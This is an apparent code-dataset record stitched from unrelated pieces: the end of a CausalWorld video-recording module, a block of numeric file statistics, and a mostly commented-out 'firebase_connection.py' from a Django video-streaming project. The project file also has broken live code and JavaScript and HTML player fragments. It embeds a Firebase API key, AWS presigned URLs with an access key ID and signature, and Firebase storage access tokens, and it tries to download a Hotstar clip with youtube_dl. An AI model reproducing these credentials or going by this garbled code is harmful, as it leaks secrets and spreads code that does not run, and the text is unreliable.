:param episode: (Episode) the logged episode
:param file_name: (str) full path where the video is being stored.
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return:
"""
actual_skip_frame = episode.world_params["skip_frame"]
env = get_world(episode.task_name,
episode.task_params,
episode.world_params,
enable_visualization=False,
env_wrappers=env_wrappers,
env_wrappers_args=env_wrappers_args)
env.set_starting_state(episode.initial_full_state, check_bounds=False)
recorder = VideoRecorder(env, "{}.mp4".format(file_name))
recorder.capture_frame()
for time, observation, reward, action in zip(episode.timestamps,
episode.observations,
episode.rewards,
episode.robot_actions):
for _ in range(actual_skip_frame):
env.step(action)
recorder.capture_frame()
recorder.close()
env.close()
def get_world(task_generator_id,
task_params,
world_params,
enable_visualization=False,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Returns a particular CausalWorld instance with optional wrappers
:param task_generator_id: (str) id of the task of the environment
:param task_params: (dict) task params of the environment
:param world_params: (dict) world_params of the environment
:param enable_visualization: (bool) if GUI visualization is enabled
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return: (CausalWorld) a CausalWorld environment instance
"""
world_params["skip_frame"] = 1
if task_params is None:
task = generate_task(task_generator_id)
else:
if "task_name" in task_params:
del task_params["task_name"]
task = generate_task(task_generator_id, **task_params)
if "enable_visualization" in world_params.keys():
world_params_temp = dict(world_params)
del world_params_temp["enable_visualization"]
env = CausalWorld(task,
**world_params_temp,
enable_visualization=enable_visualization)
else:
env = CausalWorld(task,
**world_params,
enable_visualization=enable_visualization)
for i in range(len(env_wrappers)):
env = env_wrappers[i](env, **env_wrappers_args[i])
return env
def record_video(env,
policy,
file_name,
number_of_resets=1,
max_time_steps=None):
"""
Records a video of a policy for a specified environment
:param env: (causal_world.CausalWorld) the environment to use for
recording.
:param policy: the policy to be evaluated
:param file_name: (str) full path where the video is being stored.
:param number_of_resets: (int) the number of resets/episodes to be viewed
:param max_time_steps: (int) the maximum number of time steps per episode
:return:
"""
recorder = VideoRecorder(env, "{}.mp4".format(file_name))
for reset_idx in range(number_of_resets):
policy.reset()
obs = env.reset()
recorder.capture_frame()
if max_time_steps is not None:
for i in range(max_time_steps):
desired_action = policy.act(obs)
obs, reward, done, info = env.step(action=desired_action)
recorder.capture_frame()
else:
while True:
desired_action = policy.act(obs)
obs, reward, done, info = env.step(action=desired_action)
recorder.capture_frame()
if done:
break
recorder.close()
return
| 41.038314
| 77
| 0.595556
| 1,260
| 10,711
| 4.81746
| 0.103968
| 0.085173
| 0.056837
| 0.021746
| 0.825371
| 0.79374
| 0.741516
| 0.718451
| 0.718451
| 0.697199
| 0
| 0.00167
| 0.329008
| 10,711
| 260
| 78
| 41.196154
| 0.842911
| 0.285408
| 0
| 0.761905
| 1
| 0
| 0.019322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.02381
| 0
| 0.077381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14ce02898896db8b4f4bbc54314217757b1b7349
| 62,245
|
py
|
Python
|
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | 6
|
2020-11-02T16:40:56.000Z
|
2020-11-07T06:59:00.000Z
|
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | null | null | null |
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | 2
|
2020-11-03T05:20:25.000Z
|
2020-11-03T05:38:47.000Z
|
# # import pyrebase
# # config = {
# # "apiKey": "AIzaSyDQKj9_KAG8-uMhWISn87AOHNS-fZuyBYg",
# # "authDomain": "strangeflix-85ae0.firebaseapp.com",
# # "databaseURL": "https://strangeflix-85ae0.firebaseio.com",
# # "projectId": "strangeflix-85ae0",
# # "storageBucket": "strangeflix-85ae0.appspot.com",
# # "messagingSenderId": "21362748883",
# # "appId": "1:21362748883:web:a585c9907c7362c7795326",
# # "measurementId": "G-61Z61Y7JWN"
# # }
# # firebase = pyrebase.initialize_app(config)
# # storage = firebase.storage()
# # import urllib.request
# # url_link = "https://www.youtube.com/watch?v=3D9g4erlOVE"
# # urllib.request.urlretrieve(url_link, 'video_name.mp4')
# # from pytube import YouTube
# # videourl = "https://www.youtube.com/watch?v=3D9g4erlOVE"
# # yt = YouTube(videourl)
# # yt = yt.streams.filter(progressive=True, file_extension='mp4').order_by('resolution').desc().first()
# # # if not os.path.exists(path):
# # # os.makedirs(path)
# # yt.download('/home/harshit/Desktop/webster2020/', filename='youtube_video')
# # import tldextract
# # ext = tldextract.extract('https://hr-testcases-us-east-1.s3.amazonaws.com/16007/input02.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602080980&Signature=BuwFY6Z9vMkHbKgUkyp34ieOWpA%3D&response-content-type=text%2Fplain')
# # print(ext.domain)
# # import youtube_dl
# # import os
# # import ffmpeg
# # vid = ffmpeg.probe('/home/harshit/Desktop/webster2020/song.mp4')
# # print(vid)
# # GOOD CODE
# # import moviepy.editor as mp
# # duration = mp.VideoFileClip('/home/harshit/Desktop/webster2020/meta').duration
# # print(int(duration))
# # import filetype
# # kind = filetype.guess('/home/harshit/Desktop/webster2020/meta')
# # if kind is None:
# # print('Cannot guess file type!')
# # print('File extension: %s' % kind.extension)
# # print('File MIME type: %s' % kind.mime)
# # GOOD CODE
# # ydl_opts = {'outtmpl': '/home/harshit/Desktop/webster2020/m.txt', 'ignoreerrors': True}
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # try:
# # dictMeta = ydl.extract_info("https://hr-testcases-us-east-1.s3.amazonaws.com/22937/input00.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602314535&Signature=bn8GwIgarRB4j1ypmkV4CSa7If0%3D&response-content-type=text%2Fplain", download=True)
# # print(dictMeta)
# # # dictMeta['formats'][0]['ext'] - extension
# # except Exception as e:
# # print('File protected')
# # print(e)
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # try:
# # obj = ydl.download(['https://www.hotstar.com/in/sports/cricket/indian-premier-league/mumbai-indians-vs-rajasthan-royals-m701670/match-clips/bumrahs-420-crushes-rrs-soul/1260043466'])
# # except Exception as e:
# # print(e)
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # dictMeta = ydl.extract_info(
# # "https://www.youtube.com/watch?v=3D9g4erlOVA", download=True)
# # print(dictMeta)
# # for unavailable video or protected video dictmeta = None
# # duration = dictMeta['duration']
# # ydl_opts = {
# # 'format': 'bestaudio/best',
# # 'outtmpl': 'tmp/%(id)s.%(ext)s',
# # 'noplaylist': True,
# # 'quiet': True,
# # 'prefer_ffmpeg': True,
# # 'logger': MyLogger(),
# # 'audioformat': 'wav',
# # 'forceduration':True
# # }
# # sID = "t99ULJjCsaM"
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # dictMeta = ydl.extract_info(
# # "https://www.youtube.com/watch?v={sID}".format(sID=sID),
# # download=True)
# # import requests
# # file_url = "https://hr-testcases-us-east-1.s3.amazonaws.com/22937/input00.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602314535&Signature=bn8GwIgarRB4j1ypmkV4CSa7If0%3D&response-content-type=text%2Fplain"
# # r = requests.get(file_url, stream = True)
# # with open("aws.txt","wb") as f:
# # for chunk in r.iter_content(chunk_size=1024):
# # # writing one chunk at a time to pdf file
# # if chunk:
# # f.write(chunk)
# # path_on_cloud = "videos/youtube.mp4"
# # path_local = "youtube.mp4"
# # obj = storage.child(path_on_cloud).put(path_local)
# # print(obj)
# # storage.child(path_on_cloud).download(path_local)
# # c66211e8-13bc-42cd-9db9-08349ba7dc1c --- webster.pdf
# # f29df98c-1d8d-47f1-b329-f8816d6b295c --- song.mp4
# # 7043cb4a-87ab-449d-bb99-4cdc19e59cb7 --- testcase
# # url = storage.child(path_on_cloud).get_url('')
# # print(url)
# import re
# import os
# from wsgiref.util import FileWrapper
# from django.http import StreamingHttpResponse
# import mimetypes
# def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# with open(file_name, "rb") as f:
# f.seek(offset, os.SEEK_SET)
# remaining = length
# while True:
# bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# data = f.read(bytes_length)
# if not data:
# break
# if remaining:
# remaining -= len(data)
# yield data
# from django.views.decorators.http import condition
# # @condition(etag_func=None)
# def stream_video(path):
# path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# """ responds to the video file as """
# range_header = request.META.get('HTTP_RANGE', '').strip()
# range_header = 'bytes=0-50'
# range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
# range_match = range_re.match(range_header)
# print(range_match)
# # size = os.path.getsize(path)
# content_type, encoding = mimetypes.guess_type(path)
# content_type = content_type or 'application/octet-stream'
# if range_match:
# first_byte, last_byte = range_match.groups()
# first_byte = int(first_byte) if first_byte else 0
# last_byte = first_byte + 1024 * 1024 * 8 # 8M per piece, the maximum volume of the response body
# # if last_byte >= size:
# # last_byte = size - 1
# # print(type(first_byte))
# # print(type(last_byte))
# length = last_byte - first_byte + 1
# resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
# resp['Content-Length'] = str(length)
# resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, 0)
# else:
# # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
# resp = StreamingHttpResponse(FileWrapper(open(path, 'rb')), content_type=content_type)
# resp['Content-Length'] = str(size)
# resp['Accept-Ranges'] = 'bytes'
# print(resp)
# # for obj in resp:
# # print(obj)
# # return resp
# # stream_video('https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164')
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# // console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('video');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# $('#video-in-modal').modal('show');
# video.play();
# }
# });
# # import re
# # import os
# # from wsgiref.util import FileWrapper
# # from django.http import StreamingHttpResponse
# # import mimetypes
# # def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# # with open(file_name, "rb") as f:
# # f.seek(offset, os.SEEK_SET)
# # remaining = length
# # while True:
# # bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# # data = f.read(bytes_length)
# # if not data:
# # break
# # if remaining:
# # remaining -= len(data)
# # yield data
# from django.views.decorators.http import condition
# import base64
# from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip
# @csrf_exempt
# # @condition(etag_func=None)
# def stream_video(request):
# # path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# path = '/home/harshit/Desktop/webster2020/out1.mp4'
# """ responds to the video file as """
# # range_header = request.META.get('HTTP_RANGE', '').strip()
# # range_header = 'bytes=0-50'
# # range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
# # range_match = range_re.match(range_header)
# # # print(range_match)
# # size = os.path.getsize(path)
# # content_type, encoding = mimetypes.guess_type(path)
# # content_type = content_type or 'application/octet-stream'
# # if range_match:
# # first_byte, last_byte = range_match.groups()
# # first_byte = int(first_byte) if first_byte else 0
# # last_byte = first_byte + 1024 # 8M per piece, the maximum volume of the response body
# # if last_byte >= size:
# # last_byte = size - 1
# # # print(type(first_byte))
# # # print(type(last_byte))
# # length = last_byte - first_byte + 1
# # resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
# # resp['Content-Length'] = str(length)
# # resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
# # else:
# # # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
# # resp = StreamingHttpResponse(FileWrapper(open(path, 'rb')), content_type=content_type)
# # resp['Content-Length'] = str(size)
# # resp['Accept-Ranges'] = 'bytes'
# # # print(resp)
# # for key, val in resp.items():
# # print(key)
# # print(val)
# # e = ''
# # for e in resp:
# # print(e.decode())
# # print(resp.streaming_content)
# start_time = 60
# end_time = 80
# ffmpeg_extract_subclip("/home/harshit/Desktop/webster2020/song.mp4", start_time, end_time, targetname="/home/harshit/Desktop/webster2020/out1.mp4")
# with open(path, "rb") as videoFile:
# text = base64.b64encode(videoFile.read()).decode('utf-8')
# # print(text)
# context = {
# 'resp': text
# }
# return JsonResponse(context)
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# // console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('video');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# $('#video-in-modal').modal('show');
# video.play();
# }
# });
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('movie_video_player');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# // $('#video-in-modal').modal('show');
# video.play();
# }
# });
# import base64
# from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip
# # @csrf_exempt
# # def stream_video(request):
# # # path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# # path = '/home/harshit/Desktop/webster2020/out2.mp4'
# # start_time = 250
# # end_time = 270
# # ffmpeg_extract_subclip("https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c", start_time, end_time, targetname="/home/harshit/Desktop/webster2020/out2.mp4")
# # with open(path, "rb") as videoFile:
# # text = base64.b64encode(videoFile.read()).decode('utf-8')
# # # print(text)
# # context = {
# # 'resp': text
# # }
# # return JsonResponse(context)
# playerhtml = <div class="player" id="video-player"><!-- video-head --><div class="video-head"></div><!-- video-body --><div class="video-body"><video class="player__video viewer" id="movie_video_player" preload="metadata"><source id="insert-movie-video" src="" type="video/mp4"></video></div><!-- video-footer --><div class="video-footer"><div class="player__controls" id="plact"><!-- progress-bar --><div class="progress"><div class="progress__filled"></div></div><!-- play/pause --><button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="play-icon"class="fas fa-play"></i></button> <!-- skip 10s backword --><button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">« 10s</button><!-- skip 10s forward --><button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s »</button><!-- volume --><button class="volume__button" data-toggle="tooltip" title="mute" id="volume"><i id="vol-ico" class="fas fa-volume-up"></i></button><input type="range" name="volume" id="vol-ran" class="player__slider" min="0" max="1" step="0.05" value="1"><!-- video timer --><button id="progressTime" class="timer__button"><span id="current">00:00 / </span><span id="duration">00:00</span></button><!-- playbackrate --><!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> --><div class="fullscreen"><!-- setting --><!-- <button id="setting" class="setting__button" data-toggle="tooltip" title="setting"><span class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button> --><div class="btn-group dropup"><button id="setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button><div class="dropdown-menu"><a href="#" class="dropdown-item playbacki dis">Playback speed</a><a href="#" class="dropdown-item quali dis">Video Quality</a><a href="#" class="dropdown-item shortcuts dis">Keyboard shortcuts</a><a href="#" class="dropdown-item playback">0.25</a><a href="#" class="dropdown-item playback">0.5</a><a href="#" class="dropdown-item playback">1</a><a href="#" class="dropdown-item playback">1.25</a><a href="#" class="dropdown-item playback">1.5</a><a href="#" class="dropdown-item playback">1.75</a><a href="#" class="dropdown-item playback">2</a><a href="#" class="dropdown-item qual">Auto</a><a href="#" class="dropdown-item qual">480p</a><a href="#" class="dropdown-item qual">720p</a><a href="#" class="dropdown-item qual">1080p</a></div></div><!-- picture-in-picture --><button id="pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span class="px-4"><i id="pip-ico" class="fas fa-window-maximize"></i></span></button><!-- theatre view --><button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span class="px-4"><i id="th-ico" class="fas fa-mobile-alt"></i></span></button><!-- fullscreen --><button id="fs" class="fs__button" data-toggle="tooltip" title="fullscreen(f)"><span class="px-4"><i id="fs-ico" class="fas fa-expand"></i></span></button></div></div></div></div>
import requests
# resume_header = {'Range':'bytes=100-300000'}
url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F0b3aaf33-f04d-4949-aafc-f147571b2a6e.mp4?alt=media&token=0c45781c-001f-48f4-a7cd-ed0f569f5c1d'
# r = requests.get(url, stream=True, headers=resume_header)
# with open('filename.mp4','wb') as f:
# for chunk in r.iter_content(chunk_size=1024):
# f.write(chunk)
r = requests.get(url, stream=True)
# r.raise_for_status()
with open("/home/harshit/Desktop/webster2020/check.mp4", 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
@condition(etag_func=None)
def stream_video(request, video_obj):
print(request.META)
if video_obj.video_type == 1:
video_details = FreeSeriesVideos.objects.filter(video_id=video_obj).first()
if video_details is None:
video_details = FreeMovieVideo.objects.filter(video_id=video_obj).first()
elif video_obj.video_type == 2:
video_details = SeriesVideos.objects.filter(video_id=video_obj).first()
elif video_obj.video_type == 3:
video_details = MovieVideo.objects.filter(video_id=video_obj).first()
# getting firebase url for uploaded video file
path_on_cloud = 'videos/' + video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[video_details.extension]
# firebase_video_url = storage.child(path_on_cloud).get_url(video_details.firebase_token)
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c'
firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F0b3aaf33-f04d-4949-aafc-f147571b2a6e.mp4?alt=media&token=0c45781c-001f-48f4-a7cd-ed0f569f5c1d'
# firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F05628f4f-11b2-4bb0-bc93-76bb13fa3221.mp4?alt=media&token=47726f97-1404-40bf-bdf9-75b389c8f836'
# firebase_video_url = '/home/harshit/Desktop/webster2020/song.mp4'
""" responds to the video file as """
# base_url = "https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F05628f4f-11b2-4bb0-bc93-76bb13fa3221.mp4"
# import requests
# res = requests.get(base_url).body()
# print(res)
print('video')
# req = urllib.request.Request(firebase_video_url, headers=request.META)
# rr = 'bytes=' + str(first_byte) + '-' + str(first_byte + 503500)
# # req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36')
# req.add_header('Range', rr) # <=== range header
# res = urllib.request.urlopen(req)
# import requests
# r = requests.get(firebase_video_url, request.META)
# print(r.headers)
# print(r.status_code)
# a = res.read()
# return a
# path = '/home/harshit/Desktop/webster2020/sample_video.mp4'
range_header = request.META.get('HTTP_RANGE', '').strip()
range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
range_match = range_re.match(range_header)
size = 574823
# size = 3151886
# size = 16508537
if range_match:
print("range perfect")
first_byte, last_byte = range_match.groups()
first_byte = int(first_byte) if first_byte else 0
last_byte = int(last_byte) if last_byte else size - 1
if last_byte >= size:
last_byte = size - 1
length = last_byte - first_byte + 1
# req = urllib.request.Request(firebase_video_url)
# rr = 'bytes=' + str(first_byte) + '-' + str(first_byte + 503500)
# req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36')
# req.add_header('Range', rr) # <=== range header
# res = urllib.request.urlopen(req)
# extension = str(firebase_video_url).split('?')[0][-3:]
# unique_video_name = str(uuid.uuid4())
# print(unique_video_name)
# video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + extension
# with open(video_fragment_save_path, 'wb') as f:
# f.write(res.read())
# content_type, encoding = mimetypes.guess_type(path)
# content_type = content_type or 'application/octet-stream'
content_type = 'video/mp4'
# print(content_type)
# print(encoding)
resp = StreamingHttpResponse(response_iter(firebase_video_url, request), status=206, content_type=content_type)
# resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
print('ggod')
resp['Content-Length'] = str(length)
resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
print('response sent')
# return redirect(firebase_video_url)
# os.remove(video_fragment_save_path)
else:
print("range not fine")
extension = str(firebase_video_url).split('?')[0][-3:]
unique_video_name = str(uuid.uuid4())
video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + 'flv'
req = urllib.request.Request(firebase_video_url)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0')
# req.add_header('Range', range_header) # <=== range header
res = urllib.request.urlopen(req)
with open(video_fragment_save_path, 'wb') as f:
f.write(res.read())
content_type, encoding = mimetypes.guess_type(video_fragment_save_path)
content_type = content_type or 'application/octet-stream'
# When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
resp = StreamingHttpResponse(FileWrapper(open(video_fragment_save_path, 'rb')), content_type=content_type)
resp['Content-Length'] = str(size)
# os.remove(video_fragment_save_path)
resp['accept-ranges'] = 'bytes'
print('go')
return resp
// // function to keep fetching next packet for movie video
// window.setInterval(function(){
// // call your function here
// var video = document.getElementById('movie-video');
// if (video != null && !video.paused) {
// if ((movie_maxtime_fetched - movie_previous_time_watched - Math.ceil(video.currentTime)) == 9) {
// console.log('fetching');
// var movie_id = document.getElementById('selected_movie_id').innerHTML;
// var data = {
// 'movie_id': movie_id,
// 'start_time': movie_maxtime_fetched,
// }
// // adding data to javascript form which is to be send over ajax request
// var formData = new FormData();
// formData.append('data', JSON.stringify(data));
// $.ajax({
// type: 'POST',
// url: '',
// data: formData,
// dataType: 'json',
// enctype: 'multipart/form-data',
// processData: false,
// contentType: false,
// success: function (data) {
// // checking and handling error conditions
// if (data.is_movie_exists != '') {
// movie_fetcherror = data.is_movie_exists;
// } else if (data.is_user_subscribed != '') {
// movie_fetcherror = data.is_user_subscribed;
// } else if (data.is_successful != '') {
// console.log('fetched');
// var byteCharacters = atob(data.stream);
// var byteNumbers = new Array(byteCharacters.length);
// for (let i = 0; i < byteCharacters.length; i++) {
// byteNumbers[i] = byteCharacters.charCodeAt(i);
// }
// // // Show loading animation.
// // var playPromise = video.play();
// // if (playPromise !== undefined) {
// // playPromise.then(_ => {
// // // Automatic playback started!
// // // Show playing UI.
// // })
// // .catch(error => {
// // // Auto-play was prevented
// // // Show paused UI.
// // });
// // }
// // movie_total_duration = data.movie_duration
// var blobArray = [];
// blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
// // var currentTime = video.currentTime;
// var blob = new Blob(blobArray,{'type':'video/mp4'});
// movie_nextpacket_url = window.URL.createObjectURL(blob);
// // video.currentTime = currentTime;
// // movie_previous_time_watched = 0; // if using history add history time
// movie_packet_start_time = movie_maxtime_fetched;
// movie_maxtime_fetched = Math.min(movie_maxtime_fetched + 10, movie_total_duration);
// // $('.progress__filled').css('flex', '0');
// // video.play();
// } else {
// alert('Some unexpected error has occured. Try again.');
// }
// }
// });
// }
// }
// }, 1000);
// // function to set new packet to video tag
// window.setInterval(function(){
// // call your function here
// var video = document.getElementById('movie-video');
// if (video != null) {
// if (movie_packet_start_time == (movie_previous_time_watched + Math.ceil(video.currentTime))) {
// if (movie_fetcherror != '') {
// alert(movie_fetcherror);
// }
// else{
// if (movie_nextpacket_url != '') {
// console.log('setting');
// video.src = movie_nextpacket_url;
// movie_nextpacket_url = '';
// movie_previous_time_watched = movie_packet_start_time;
// video.play();
// console.log('done');
// }
// }
// }
// }
// }, 1000);
<div id="video_with_comments" style="display: none;">
<!-- video running section -->
<div class="runner-section container-fluid">
<div class="row">
<!-- video-player -->
<div class="col-xl-9 col-lg-8 col-md-7 player-wrapper">
<!-- if paid -->
<div class="player" id="video-player">
<!-- video-head -->
<div class="video-head">
<div class="text-white">
<h3 class="font-weight-bold">heading</h4>
</div>
</div>
<!-- video-body -->
<div class="video-body">
<video class="player__video viewer" id="video" preload="metadata">
<source
src=""
id="insert-vid" type="video/mp4">
</video>
</div>
<!-- video-footer -->
<div class="video-footer">
<div class="player__controls" id="plact">
<!-- progress-bar -->
<div class="progress">
<div class="progress__filled"></div>
</div>
<!-- play/pause -->
<button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="play-icon"
class="fas fa-play"></i></button>
<!-- skip 10s backword -->
<button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">«
10s</button>
<!-- skip 10s forward -->
<button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s
»</button>
<!-- volume -->
<button class="volume__button" data-toggle="tooltip" title="mute" id="volume"><i id="vol-ico"
class="fas fa-volume-up"></i></button>
<input type="range" name="volume" id="vol-ran" class="player__slider" min="0" max="1"
step="0.05" value="1">
<!-- video timer -->
<button id="progressTime" class="timer__button">
<span id="current">00:00 / </span>
<span id="duration">00:00</span>
</button>
<!-- playbackrate -->
<!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> -->
<div class="fullscreen">
<!-- setting -->
<!-- <button id="setting" class="setting__button" data-toggle="tooltip" title="setting"><span
class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button> -->
<button type="button" class="prev-button mr-3">
<i class="fas fa-step-backward"></i>
</button>
<button type="button" class="next-button">
<i class="fas fa-step-forward"></i>
</button>
<div class="btn-group dropup">
<button id="setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true"
aria-expanded="false"><span class="px-4"><i id="setting-ico"
class="fas fa-cog"></i></span></button>
<div class="dropdown-menu plbcrt">
<a href="#" class="dropdown-item playbacki dis">Playback speed</a>
<a href="#" class="dropdown-item quali dis">Video Quality</a>
<a href="#" class="dropdown-item shortcuts dis">Keyboard shortcuts</a>
